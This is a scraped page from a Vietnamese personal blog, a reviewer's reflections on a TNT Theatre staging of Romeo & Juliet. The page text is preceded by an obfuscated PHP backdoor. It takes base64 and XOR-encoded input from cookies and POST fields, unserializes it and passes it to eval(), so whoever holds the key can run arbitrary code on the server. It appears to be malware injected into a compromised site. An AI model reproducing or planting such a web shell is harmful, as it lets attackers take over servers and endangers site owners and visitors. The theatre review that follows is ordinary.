$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Romeo & Juliet – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Romeo & Juliet

Romeo & Juliet

Anh không thích Shakespeare.
Vì lí do đấy dĩ nhiên anh không thích Romeo & Juliet.

Các bạn hỏi anh nguyên nhân tại sao ư? Anh không hay lấy cái mỡ hỗn độn cảm xúc yêu hay ghét của anh, ngồi tích phân nó ra [nghe có vẻ toán học nhỉ], và nêu đích xác cho các bạn biết từng nhân tố đó là gì. Nhưng lần này ngoại lệ vậy.

E hèm, một chút ghen tị khi mình si tình chẳng kém gì Romeo mà lại không tìm được ai như Juliet, vừa xinh đẹp

O, she doth teach the torches to burn bright!
It seems she hangs upon the cheek of night

lại vừa thuỷ chung

And I will do it without fear or doubt,
To live an unstain’d wife to my sweet love.

Đó cũng có thể là chút mỉa mai, khi thấy thiên hạ đua nhau đọc và tán dương Romeo & Juliet, ca ngợi đấy là thiên tình sử diễm lệ; nhưng hầu như chẳng ai đủ can đảm chọn sống một cách sống và yêu theo cách yêu như thế, hay đã chọn rồi thì cũng không đi được hết con đường mình đã chọn.

Thêm một lí do cá nhân khác, mặc dù cái này anh tự nhận là anh không đúng lắm, đấy là thứ ngôn ngữ trong Romeo & Juliet. Dĩ nhiên, sẽ có những bạn với vốn kiến thức uyên thâm, nhảy vào giảng cho anh bài học về thế nào là ngôn ngữ trong văn, thơ, kịch… cổ. Anh tiếp nhận. Áp dụng cái nhìn của thời đại này đối với những năm của thế kỉ XVI, XVII thì quả là lệch lạc. Nhưng anh vẫn rất không thích ngôn ngữ [mà anh cho là] sáo rỗng ấy, dù cho nó hay, một lần nữa, anh thừa nhận.

Nhưng dĩ nhiên, việc không thích và việc viết cảm nhận, là hai việc hoàn toàn khác nhau. Nhất là khi nó lại đi kèm với suy nghĩ: làm sao cho đáng với số tiền đã bỏ ra mua vé ((150k VNĐ/vé, nghĩa là bằng 10 tô bún bò hằng ngày của anh *cười*)).

Thế nên, bài này của anh, sẽ là cảm nhận về Romeo & Juliet, hay nói chính xác tới từng milimét một là vở kịch Romeo & Juliet, diễn ra tại nhà hát kịch Thành Phố mà anh đã có dịp xem tối hôm qua.

Thông tin về nó thì anh đã tìm cho các bạn ở VietNamNet:
Vở kịch kinh điển Romeo & Juliet của đại văn hào William Shakespeare lần đầu tiên được nhà hát TNT Vương quốc Anh mang sang công diễn tại Việt Nam vào đầu tháng 5 tới.
nghe tên nhà hát cứ như tên sản phẩm của Nobel bạn anh ấy nhỉ?

Ở một đất nước, nơi mà tuy hằng ngày báo đài vẫn nhắc ầm ầm về cụm từ “thời hội nhập”, người dân đã có dịp tiếp xúc nhiều hơn với các tác phẩm văn hoá nghệ thuật đến từ nước ngoài. Bọn trẻ giờ mới lớp 6, lớp 7 đã có thể nhún nhảy theo nhạc của High School Musical, các bạn gái thơ mộng thì hầu hết giờ đang trông lên poster film Twilight treo đầu giường mà ngắm anh Edward Cullen xinh giai của các bạn hàng giờ. Tuy nhiên, những thứ thuộc về nghệ thuật kinh điển (anh xin lỗi, anh không biết dùng từ gì khác, các bạn có gợi ý gì chăng?) thì lại ít được trình chiếu.

Nếu các bạn thật sự quan tâm, thì hẳn không ít thì nhiều, đã vài ba lần các bạn thấy ghen tị với bọn phương Tây mắt xanh mũi lõ, khi nó có thể xem sân khấu kịch Broadway ((http://en.wikipedia.org/wiki/Broadway_musical)) bất cứ khi nào nó muốn (và có suất diễn). Nó có thể hoà mình vào những vở nhạc kịch bất hủ như Les Miserables, Notre-Dame de Paris của Victor Hugo ((http://en.wikipedia.org/wiki/Victor_Hugo)), hay Swan Lake của Peter Ilyich Tchaikovsky ((http://en.wikipedia.org/wiki/Swan_Lake)). Những điều này chúng ta không thể.

Nói thế để các bạn thấy, cơ hội được xem các vở kịch nước ngoài diễn ở sân khấu Việt Nam là không nhiều. Cách đây tầm vài tháng thì là Annie Get Your Gun ((http://en.wikipedia.org/wiki/Annie_Get_Your_Gun)), và giờ đây là Romeo & Juliet. Dù các vở đấy có hay hoặc còn chỗ thiếu sót, thì âu đó cũng là tín hiệu đáng mừng, vì chúng ta có thể có cơ hội để hầu như cảm nhận hoàn toàn tác phẩm – với đúng nghĩa là bản thân của nó.

Romeo & Juliet hôm qua trên sân khấu rất nhẹ nhàng và đơn giản, tựa như một bài thơ sonnet – thể loại thơ tình rất thịnh hành vào những năm cuối thế kỷ 16 ((http://en.wikipedia.org/wiki/Sonnet)). Đạo cụ trên sân khấu chỉ là phông màn, và vài thùng các-tông. Không biết là do nhà hát kịch Thành phố đã tương đối cũ kĩ, nên góp phần ảnh hưởng đến thị giác của anh, hoặc giả là đấy là ý đồ của người dàn dựng vở kịch, mà tông màu của vở kịch cứ trắng – đen, đơn điệu đến nhạt nhoà. Có lẽ ý đồ của nhà hát TNT là khiến khán giả tập trung vào diễn xuất, biểu cảm của các nghệ sĩ đứng trên sân khấu hơn là nhờ vào kĩ xảo chăng?

Tuy nhiên, cái màn hình subtitle có vẻ đã phá vỡ điều đó.

Làm dâu trăm họ luôn khó. Anh biết điều đấy. Anh có thể hiểu một phần ý đồ của nhà hát khi treo lơ lửng cái màn hình để chiếu subtitle là giúp mọi người có thể hiểu được câu chuyện. Nếu không có cái màn hình ấy, anh đồ rằng đa phần mọi người sẽ không nghe và hiểu hoàn toàn những gì đang phát ra từ miệng các nghệ sĩ, bởi ngôn ngữ trong vở kịch toàn tiếng Anh cổ, khó hiểu ngay cả với người Anh bản xứ. Nhưng, cái màn hình ấy cũng tạo hiệu ứng mọi người nhìn lên đấy quá nhiều, khiến đôi khi bỏ sót các góc rất nhỏ trên sân khấu, như đoạn Romeo nằm ngay sát tận cùng bên phải cánh gà, hay vẻ ngượng ngùng của Juliet khi phát hiện Romeo đang núp dưới ban công, nghe hết lời mình thổ lộ…

Nếu là anh, có lẽ anh cũng sẽ không biết giải quyết sao để cho mọi người vừa tập trung vào diễn biến trên sân khấu, vừa hiểu được vở kịch. Thôi thì, đành chấp nhận, vì mình dốt. Nhưng giá như subtitle bằng tiếng Anh thì thú vị hơn nhiều, bởi có những câu thơ sonnet rất khó dịch ra tiếng Việt làm sao để hợp với vần điệu của nó. Và nếu đã bỏ 150k (với điều kiện mua 10 vé), 300k, 500k ra để vào xem một vở kịch, thì, cứ cho là áp đặt chủ quan đi, có lẽ đều kha khá tiếng Anh. Vậy thì việc chiếu subtitle tiếng Việt là không hợp lí lắm.

Nãy giờ nói dông dài về những cái ngoại cảnh, giờ anh đi vào bản thân vở kịch được trình chiếu nhé.

Một tác phẩm nghệ thuật thành công, là phải đi vào lòng người đọc, và ở đó trong một thời gian dài. Nếu xét trên phương diện này, thì có lẽ vở kịch tối qua không đạt được. Những gì đọng lại trong anh sau hơn hai tiếng đồng hồ là khá nhạt nhoà. Điều này anh có thể lí giải đôi chút, có lẽ anh mong đợi gì đó lớn lao hơn ở vở kịch này, một phần khác là anh đã đọc qua bản nguyên tác văn học của Shakespeare.

Khi mà nhắm mắt lại anh cũng có thể kể vanh vách câu chuyện như thế nào, thì cái suy nghĩ chủ quan của anh, sẽ áp đặt những cảnh trên sân khấu chỉ là mô phỏng, cụ thể hoá cho những gì anh đã biết. Đây là một cái dốt của anh. Các bạn chỉ anh làm sao để thoát ra cái suy nghĩ áp đặt đấy với?

Vở kịch nói bằng tiếng Anh, thoại nhiều, nhưng khi người ta chỉ có thể hiểu lơ mơ về những gì các diễn viên đang nói, thì sẽ không có cảm giác mình bị cuốn vào vở kịch. Có lẽ, diễn ở Việt Nam thế này, thì một vở nhạc kịch, với phần nhạc chiếm đa số, sẽ tốt hơn chăng?

Vở kịch trình diễn tối qua không phải không có những điểm lạ và đẹp. Đấy là cách hiện thực hoá hình ảnh thần tình yêu Cupid và tử thần đầy chết chóc, nhưng vẫn chứa vẻ gì đó đầy hư ảo. Các động tác múa của Cupid nhẹ nhàng, chậm chạp, bất kể là các nhân vật chính trên sân khấu đang như thế nào.

Cũng cần gởi lời khen tới các diễn viên của nhà hát TNT. Với số thành viên (xuất hiện trên sân khấu) rất ít, họ vẫn có thể tái hiện lại hầu như đúng nguyên tác. Ngôn ngữ của vở kịch trong cái nhìn của người hiện đại như anh đã nói ở trên là kiểu cách, sáo rỗng, nhưng diễn xuất rất thật. Hừm, kiểu như đấy là chính họ chứ không phải là đang vào vai nào đó trong một vở kịch.

Một tác phẩm nghệ thuật thành công, là phải đi vào lòng người đọc, và ở đó trong một thời gian dài. Anh nhắc lại câu này. Có thể vở kịch tối qua, sau này anh sẽ chỉ nhớ về nó như là vở kịch Romeo & Juliet đầu tiên mà anh được xem. Nhưng, chính vào cái thời khắc tối qua ấy, anh đã mơ hồ bắt được cái “hồn” của tác phẩm. Đó có thể là sự thù hận lên tới đỉnh điểm qua cách hành xử của Tybalt và Mercutio. Đó là vẻ rất thơ ngây và nhưng đầy nồng cháy của Juliet khi đứng trên lầu thổ lộ lời yêu. Đó cũng là hình ảnh nông nổi nhưng đầy nhiệt huyết của chàng Romeo trẻ tuổi.

Không cần dài lâu, chỉ cần một vài phút giây ấy thôi, là đủ…

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.